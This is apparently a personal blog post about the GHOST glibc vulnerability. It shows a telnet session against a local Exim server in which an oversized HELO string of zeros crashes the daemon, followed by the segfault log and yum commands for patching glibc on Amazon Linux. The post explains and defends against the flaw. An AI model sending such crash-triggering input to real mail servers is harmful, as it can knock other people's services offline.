So the GHOST vulnerability has been a hot topic. Articles like this and this discuss what it’s about, and it’s efffects, so I won’t go into that.
Reading further, I find that articles like this highlight the point that the danger of this vulnerability is limited, since initially there can only be 4 to 8 bytes of code execution, and additional coding is necessary to further take advantage of this.
Exploit Example
There is a Proof-of-Concept demonstrating an exploit with the Exim mail server in this python script, with futher explanation here. In this example the attacker can retreive the segmentation fault
error of the server remotely.
user@...ian-7-7-64b:~$ telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 debian-7-7-64b ESMTP Exim 4.80 ...
HELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Connection closed by foreign host.
user@...ian-7-7-64b:~$ dmesg
...
[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]
This is only a Exmin specific exploit, but opens up possibilities of other softwares having similar(or worse) exploits.
Protecting yourself against it
Amazon came out with a patch already.
So any of us using Amazon Linux AMI should go ahead and patch this up by
yum clean all
yum update glibc
Check that the glibc update version is glibc-2.17-55.93.amzn1
.
After that, reboot your instance for everything to take effect.
It takes some work to remove each production server from the load balancer, patch & restart it, then attach it back on to the load balancer… this took me some time and effort. I wish there is a way to do this more easily. Maybe it calls for some automation.
Oh well. Since we’ve seen Heartbleed, Shellshock, and POODLE already in this past year or two, I’m pretty sure we’ll run ino more.
And I think that is a good thing, because we all are benefiting from vulnerabilities being patched up and in result refining the software the community uses.